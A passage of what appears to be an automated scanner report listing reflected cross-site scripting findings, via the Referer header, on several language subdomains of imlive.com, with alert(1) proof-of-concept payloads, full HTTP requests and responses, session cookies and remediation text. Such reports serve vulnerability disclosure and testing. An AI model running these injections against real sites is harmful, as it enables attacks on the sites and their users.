Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6a328'-alert(1)-'eadcfd684a2

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=anvfcz45cym1eq45uegwmg45; path=/; HttpOnly
Set-Cookie: pbr=; expires=Thu, 27-Jan-2011 14:17:05 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=anvfcz45cym1eq45uegwmg45; path=/; HttpOnly
Set-Cookie: pbr=; expires=Thu, 27-Jan-2011 14:17:05 GMT; path=/
Set-Cookie: spvdr=vd=c9a4e47e-04fb-49d0-a02e-72013ee5baf4&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:05 GMT; path=/
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:04 GMT
Connection: close
Content-Length: 20745
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/login.aspx&he=br.imlive.com&ul=/webcam-login/&rf=http://www.google.com/search?hl=en^q=6a328'-alert(1)-'eadcfd684a2&iy=dallas&id=44&iu=1&vd=c9a4e47e-04fb-49d0-a02e-72013ee5baf4';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

2.176. http://cafr.imlive.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97e0d'-alert(1)-'85ef759ec87 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=97e0d'-alert(1)-'85ef759ec87

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=abjerb55miue1jybuviox355; path=/; HttpOnly
Set-Cookie: pcafr=; expires=Thu, 27-Jan-2011 14:16:56 GMT; path=/
Set-Cookie: ASP.NET_SessionId=abjerb55miue1jybuviox355; path=/; HttpOnly
Set-Cookie: pcafr=; expires=Thu, 27-Jan-2011 14:16:56 GMT; path=/
Set-Cookie: spvdr=vd=b251e2ee-c181-407f-9403-d9aeab43a548&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:56 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:55 GMT
Connection: close
Content-Length: 18800
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=cafr.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=97e0d'-alert(1)-'85ef759ec87&iy=dallas&id=44&iu=1&vd=b251e2ee-c181-407f-9403-d9aeab43a548';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

2.177. http://cafr.imlive.com/waccess/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9536b'-alert(1)-'e58569d4bd5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9536b'-alert(1)-'e58569d4bd5

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=jrzbde55yhvkm0yd0wajeo55; path=/; HttpOnly
Set-Cookie: pcafr=; expires=Thu, 27-Jan-2011 14:17:03 GMT; path=/
Set-Cookie: ASP.NET_SessionId=jrzbde55yhvkm0yd0wajeo55; path=/; HttpOnly
Set-Cookie: pcafr=; expires=Thu, 27-Jan-2011 14:17:03 GMT; path=/
Set-Cookie: spvdr=vd=6a0168f5-b4e1-4005-82b3-4d8109481900&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:03 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:03 GMT
Connection: close
Content-Length: 220503
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/hostlist.ashx&he=cafr.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=9536b'-alert(1)-'e58569d4bd5&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=6a0168f5-b4e1-4005-82b3-4d8109481900';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

2.178. http://de.imlive.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6236'-alert(1)-'6b063b5f82a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e6236'-alert(1)-'6b063b5f82a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wmkuv23dire3y5455dflznbk; path=/; HttpOnly
Set-Cookie: pde=; expires=Thu, 27-Jan-2011 14:17:00 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wmkuv23dire3y5455dflznbk; path=/; HttpOnly
Set-Cookie: pde=; expires=Thu, 27-Jan-2011 14:17:00 GMT; path=/
Set-Cookie: spvdr=vd=4e0a90f8-4f17-4e29-82a0-f518b35446a3&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:00 GMT; path=/
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:00 GMT
Connection: close
Content-Length: 18350
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=de.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=e6236'-alert(1)-'6b063b5f82a&iu=1&vd=4e0a90f8-4f17-4e29-82a0-f518b35446a3';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typeof obj.addEvent
...[SNIP]...

2.179. http://de.imlive.com/waccess/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e45d9'-alert(1)-'4b50bf8581f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e45d9'-alert(1)-'4b50bf8581f

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=go54xq451damzdiseidhmr55; path=/; HttpOnly
Set-Cookie: pde=; expires=Thu, 27-Jan-2011 14:17:05 GMT; path=/
Set-Cookie: ASP.NET_SessionId=go54xq451damzdiseidhmr55; path=/; HttpOnly
Set-Cookie: pde=; expires=Thu, 27-Jan-2011 14:17:05 GMT; path=/
Set-Cookie: spvdr=vd=07626285-c0ff-437f-958c-dcbbd088dd7f&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:05 GMT; path=/
Set-Cookie: ide=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:05 GMT
Connection: close
Content-Length: 169257
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/hostlist.ashx&he=de.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=e45d9'-alert(1)-'4b50bf8581f&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=07626285-c0ff-437f-958c-dcbbd088dd7f';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

2.180. http://dk.imlive.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c15d'-alert(1)-'545d614c845 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8c15d'-alert(1)-'545d614c845

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=mw4rtt55tfb3b345unpsg3bl; path=/; HttpOnly
Set-Cookie: pdk=; expires=Thu, 27-Jan-2011 14:17:09 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mw4rtt55tfb3b345unpsg3bl; path=/; HttpOnly
Set-Cookie: pdk=; expires=Thu, 27-Jan-2011 14:17:09 GMT; path=/
Set-Cookie: spvdr=vd=6f35da7a-dc76-47e3-98a4-e43628726799&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:09 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 17947
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=dk.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=8c15d'-alert(1)-'545d614c845&iy=dallas&id=44&iu=1&vd=6f35da7a-dc76-47e3-98a4-e43628726799';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

2.181. http://dk.imlive.com/waccess/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58ec0'-alert(1)-'1ca19f61f52 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=58ec0'-alert(1)-'1ca19f61f52

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=3art1xq5rk2h0l45whar1iir; path=/; HttpOnly
Set-Cookie: pdk=; expires=Thu, 27-Jan-2011 14:17:14 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3art1xq5rk2h0l45whar1iir; path=/; HttpOnly
Set-Cookie: pdk=; expires=Thu, 27-Jan-2011 14:17:14 GMT; path=/
Set-Cookie: spvdr=vd=76cd456c-f3e0-433a-8774-56766a677704&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:14 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:13 GMT
Connection: close
Content-Length: 220246
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/hostlist.ashx&he=dk.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=58ec0'-alert(1)-'1ca19f61f52&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=76cd456c-f3e0-433a-8774-56766a677704';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

2.182. http://es.imlive.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ef76'-alert(1)-'7097e4ccd25 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6ef76'-alert(1)-'7097e4ccd25

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=zuzkb455ihqfoc55yv0wku45; path=/; HttpOnly
Set-Cookie: pes=; expires=Thu, 27-Jan-2011 14:17:11 GMT; path=/
Set-Cookie: ASP.NET_SessionId=zuzkb455ihqfoc55yv0wku45; path=/; HttpOnly
Set-Cookie: pes=; expires=Thu, 27-Jan-2011 14:17:11 GMT; path=/
Set-Cookie: spvdr=vd=2550678d-c9a3-476d-862b-ab4b8888cd75&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:11 GMT; path=/
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:10 GMT
Connection: close
Content-Length: 18390
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=es.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=6ef76'-alert(1)-'7097e4ccd25&iy=dallas&id=44&iu=1&vd=2550678d-c9a3-476d-862b-ab4b8888cd75';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

2.183. http://es.imlive.com/waccess/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 751a4'-alert(1)-'3e6a4981811 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=751a4'-alert(1)-'3e6a4981811

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ly2txpzezmcm5155sslifc45; path=/; HttpOnly
Set-Cookie: pes=; expires=Thu, 27-Jan-2011 14:17:19 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ly2txpzezmcm5155sslifc45; path=/; HttpOnly
Set-Cookie: pes=; expires=Thu, 27-Jan-2011 14:17:19 GMT; path=/
Set-Cookie: spvdr=vd=ff1efd09-20e4-4d52-8133-071e0b292933&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:19 GMT; path=/
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:18 GMT
Connection: close
Content-Length: 211707
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/hostlist.ashx&he=es.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=751a4'-alert(1)-'3e6a4981811&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=ff1efd09-20e4-4d52-8133-071e0b292933';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

2.184. http://fr.imlive.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fr.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8655a'-alert(1)-'b1450d4e902 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8655a'-alert(1)-'b1450d4e902

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=n3rd2q45ehprj445d1b53wnr; path=/; HttpOnly
